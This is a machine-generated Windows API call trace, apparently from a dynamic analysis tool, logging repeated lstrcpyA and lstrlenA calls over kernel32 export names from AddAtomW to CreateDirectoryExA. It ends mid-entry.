[0082.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.450] lstrlenA (lpString="ADDATOMW") returned 8 [0082.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.450] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.450] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.451] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.451] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.451] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.451] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.451] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.451] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.451] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.451] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.451] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.451] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.451] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.451] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.451] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.451] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.451] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.451] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.451] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.451] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.451] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.452] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.452] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.452] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.452] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.452] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.452] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.452] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.452] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.452] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.452] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.452] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.452] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.452] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.452] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.452] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.452] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.452] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.452] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.452] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.453] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.453] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.453] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.453] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.453] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.453] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.453] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.453] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.453] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.453] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.453] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.453] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.453] lstrlenA (lpString="BEEP") returned 4 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.453] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.453] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.453] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.453] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.453] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.453] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.454] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.454] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.454] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.454] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.454] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.454] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.454] lstrlenA (lpString="CANCELIO") returned 8 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.454] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.454] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.454] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.454] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.454] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.454] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.454] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.454] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.454] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.454] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.454] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.454] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.454] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.455] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.455] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.455] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.455] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.455] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.455] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.455] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.455] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.455] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.455] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.455] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.455] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.455] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.455] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.455] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.455] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.455] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.455] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.455] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.456] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.456] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.456] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.456] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.456] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.456] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.456] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.456] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.456] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.456] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.456] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.456] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.456] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.456] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.456] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.456] lstrlenA (lpString="COPYFILEA") returned 9 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.456] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.456] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.456] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.457] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.457] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.457] lstrlenA (lpString="COPYFILEW") returned 9 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.457] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.457] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.457] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.457] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.457] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.457] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.457] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.457] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") 